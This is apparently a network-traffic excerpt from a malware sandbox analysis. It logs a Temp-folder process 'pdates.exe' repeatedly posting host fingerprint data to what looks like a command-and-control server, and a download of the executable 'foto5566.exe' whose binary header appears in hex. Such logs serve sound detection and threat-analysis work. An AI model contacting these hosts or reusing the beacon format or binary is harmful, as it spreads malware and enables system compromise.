Jul 27, 2023 01:34:22.140031099 CEST	3858	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:22.188034058 CEST	3858	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
296	192.168.2.5	50016	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:22.342011929 CEST	3859	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:22.390511036 CEST	3859	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
297	192.168.2.5	50017	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:22.599003077 CEST	3861	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:22.647208929 CEST	3862	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
298	192.168.2.5	50018	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:22.829123974 CEST	3863	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:22.878803968 CEST	3864	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
299	192.168.2.5	50019	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:23.050478935 CEST	3864	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:23.099885941 CEST	3865	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49719	77.91.124.47	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:32:59.300067902 CEST	104	OUT	GET /new/foto5566.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 77.91.124.47
Jul 27, 2023 01:32:59.345643044 CEST	105	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 27 Jul 2023 07:32:42 GMT Accept-Ranges: bytes ETag: "9d577f875cc0d91:0" Server: Microsoft-IIS/10.0 Date: Thu, 27 Jul 2023 07:32:58 GMT Content-Length: 399360 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 e2 25 87 93 83 4b d4 93 83 4b d4 93 83 4b d4 f6 e5 4e d5 92 83 4b d4 f6 e5 48 d5 92 83 4b d4 f6 e5 4f d5 87 83 4b d4 f6 e5 4a d5 82 83 4b d4 93 83 4a d4 0d 83 4b d4 f6 e5 43 d5 9a 83 4b d4 f6 e5 b4 d4 92 83 4b d4 f6 e5 49 d5 92 83 4b d4 52 69 63 68 93 83 4b d4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 60 8d 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 0d 00 64 00 00 00 b0 05 00 00 00 00 00 60 6a 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 70 06 00 00 04 00 00 c6 91 06 00 02 00 40 c1 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c a2 00 00 b4 00 00 00 00 c0 00 00 20 91 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 06 00 88 08 00 00 10 14 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 63 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1a 00 00 00 80 00 00 00 02 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 52 10 00 00 00 a0 00 00 00 12 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 a0 05 00 00 c0 00 00 00 92 05 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 88 08 00 00 00 60 06 00 00 0a 00 00 00 0e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 82 40 00 50 82 40 00 a4 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$%KKKNKHKOKJKJKCKKIKRichKPEL`bd`j@p@ `T@.textcd `.dataHh@.idataRj@@.rsrc\|@@.reloc`@B@P@
Jul 27, 2023 01:32:59.345721960 CEST	106	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 80 40 00 70 14 40 00 01 00 00 00 88 a2 40 00 00 00 00 00 c8 10 40 00 1c 00 00 00 00 75 01 00 00 Data Ascii: @p@@@u j@i@@o@012P44BIPJJ`KKLLLO
Jul 27, 2023 01:32:59.345776081 CEST	107	IN	Data Raw: 10 00 00 04 00 00 00 2e 43 52 54 24 58 49 59 00 00 00 00 c4 10 00 00 04 00 00 00 2e 43 52 54 24 58 49 5a 00 00 00 00 c8 10 00 00 78 00 00 00 2e 67 66 69 64 73 00 00 40 11 00 00 30 03 00 00 2e 72 64 61 74 61 00 00 70 14 00 00 04 00 00 00 2e 72 64 Data Ascii: .CRT$XIY.CRT$XIZx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mnr\.xdata$x.datah.bss.idata$5.00cfg.idata$2
Jul 27, 2023 01:32:59.345830917 CEST	109	IN	Data Raw: 50 33 c0 eb 4f ff 15 cc a1 40 00 8b d0 8b ce e8 9d 29 00 00 68 00 02 00 00 8d 85 fc fd ff ff c6 85 fc fd ff ff 00 50 ff 75 14 ff 35 3c 9a 40 00 ff 15 e8 a1 40 00 8d 85 fc fd ff ff 50 68 3f 08 00 00 56 ff 15 d4 a1 40 00 6a ff ff 15 dc a1 40 00 33 Data Ascii: P3O@)hPu5<@@Ph?V@j@3@M3^bR]UQSVWE30>tFfKuEf03#<7tGf7Kt78t@_^[]U@3EESVE
Jul 27, 2023 01:32:59.345906973 CEST	110	IN	Data Raw: 45 f0 50 68 c4 11 40 00 57 ff 15 20 a0 40 00 57 57 57 8d 45 ec c7 45 ec 01 00 00 00 50 57 ff 75 e8 c7 45 f8 02 00 00 00 ff 15 34 a0 40 00 ff 75 e8 8b f0 ff 15 88 a0 40 00 85 f6 5e 57 75 07 ba f6 04 00 00 eb a9 6a 02 ff 15 d8 a1 40 00 85 c0 75 07 Data Ascii: EPh@W @WWWEEPWuE4@u@^Wuj@u3@M3_TM]Suu5ujj@jh@@"3$uf=@@ujj@[[UQ=0@t6EPhjhp@h@uh0@u
Jul 27, 2023 01:32:59.345963955 CEST	111	IN	Data Raw: 40 00 85 c0 74 78 68 fc 11 40 00 8d 44 24 40 50 ff 15 d4 a0 40 00 85 c0 74 64 8d 44 24 3c 8b d3 50 8d 8c 24 54 01 00 00 e8 5b f2 ff ff 68 40 11 40 00 8b d3 8d 8c 24 54 01 00 00 e8 1f 41 00 00 8d 8c 24 50 01 00 00 e8 19 ff ff ff eb 30 50 8b d3 8d Data Ascii: @txh@D$@P@tdD$<P$T[h@@$TA$P0P$T+h$TP@$PP\|@D$PWL@JW@V@$\_^[3H]U@3EVWWP3@tKh@
Jul 27, 2023 01:32:59.346016884 CEST	113	IN	Data Raw: 3e fe ff ff 85 c0 0f 84 28 01 00 00 8d 45 e4 50 ff 75 f8 ff 15 2c a2 40 00 89 45 e8 85 c0 0f 84 d7 00 00 00 50 6a 42 ff 15 80 a0 40 00 8b f8 85 ff 0f 84 fd 00 00 00 57 ff 15 a0 a0 40 00 89 45 e0 85 c0 0f 84 eb 00 00 00 50 ff 75 e8 ff 75 e4 ff 75 Data Ascii: >(EPu,@EPjB@W@EPuuu$@EPEPhD@u(@tt}tnEH@MMUEEEMEvv6DvDv\|]39u\|9u~9u\|e9u`W
Jul 27, 2023 01:32:59.346069098 CEST	114	IN	Data Raw: 00 00 00 80 3d 3a 8a 40 00 00 74 0f b9 3a 8a 40 00 e8 43 f5 ff ff e9 b4 00 00 00 6a 0a 68 9c 12 40 00 56 ff 15 e0 a0 40 00 85 c0 74 0a 50 56 ff 15 28 a1 40 00 8b f8 83 3d 84 81 40 00 00 74 06 ff 15 3c a0 40 00 83 3d 24 8a 40 00 00 74 05 33 c0 40 Data Ascii: =:@t:@Cjh@V@tPV(@=@t<@=$@t3@}\tpf@@3Cf;tftfu?4@t38@u*u!h>hGh@P/6==u33PjPP3M_^3[=]U
Jul 27, 2023 01:32:59.346120119 CEST	115	IN	Data Raw: 75 3d 6a 04 6a 20 56 53 ba 4a 05 00 00 8b cf e8 68 11 00 00 83 f8 06 0f 85 db 00 00 00 56 53 ff 15 b4 a0 40 00 85 c0 75 16 56 6a 10 56 53 ba cb 04 00 00 8b cf e8 42 11 00 00 e9 c9 00 00 00 68 40 11 40 00 ba 04 01 00 00 8b cb e8 fd 31 00 00 8b cb Data Ascii: u=jj VSJhVS@uVjVSBh@@14%uVjVV=@\u=@\t3@P%tn3CSW@d3VjVV@hT@W@3Vhhh5W@f9@@uVh6W@P
Jul 27, 2023 01:32:59.346174955 CEST	117	IN	Data Raw: 85 c0 0f 8f a0 00 00 00 85 c9 75 34 85 c0 8b 85 70 fe ff ff 75 15 0f b7 c8 8b 85 5c fe ff ff 3b 4c 18 08 72 38 3b 4c 18 14 eb 30 8b 8d 5c fe ff ff 0f b7 c0 3b 44 19 08 0f 83 94 00 00 00 eb 1d 85 c0 0f 85 8a 00 00 00 8b 8d 5c fe ff ff 8b 85 70 fe Data Ascii: u4pu\;Lr8;L0\;D\p;DvutPL`3P;Tk<``tGX`Lu8Ty\|XPQ
Jul 27, 2023 01:32:59.391206026 CEST	118	IN	Data Raw: 34 da ff ff 33 f6 46 3b de 75 4a 68 04 01 00 00 8d 94 24 94 00 00 00 b9 f8 12 40 00 e8 25 09 00 00 85 c0 74 a5 80 3d 42 8c 40 00 00 0f 85 5f 02 00 00 6a ff 68 c0 12 40 00 6a ff 8d 84 24 9c 00 00 00 50 56 6a 7f ff 15 68 a0 40 00 48 2b c6 0f 84 3c Data Ascii: 43F;uJh$@%t=B@_jh@j$PVjh@H+<D$PD$P$4t$u"3@f9@@t= @tuD$$D=@4@&s@VS@3T$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	49746	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:09.684741974 CEST	2862	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:09.734213114 CEST	2863	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
300	192.168.2.5	50020	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:23.269845009 CEST	3865	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:23.319370985 CEST	3865	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
301	192.168.2.5	50021	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:23.506516933 CEST	3866	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:23.557128906 CEST	3866	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
302	192.168.2.5	50022	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:23.721776962 CEST	3899	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:23.771517992 CEST	3900	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
303	192.168.2.5	50023	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:23.925955057 CEST	3901	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:23.975224018 CEST	3901	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
304	192.168.2.5	50024	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:24.122653961 CEST	3902	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:24.171263933 CEST	3903	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
305	192.168.2.5	50025	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:24.338424921 CEST	3904	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:24.387618065 CEST	3904	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
306	192.168.2.5	50026	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:24.548702955 CEST	3908	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:24.597551107 CEST	3908	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
307	192.168.2.5	50027	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:24.786272049 CEST	3910	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:24.835278988 CEST	3910	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
308	192.168.2.5	50028	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:24.998605967 CEST	3911	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
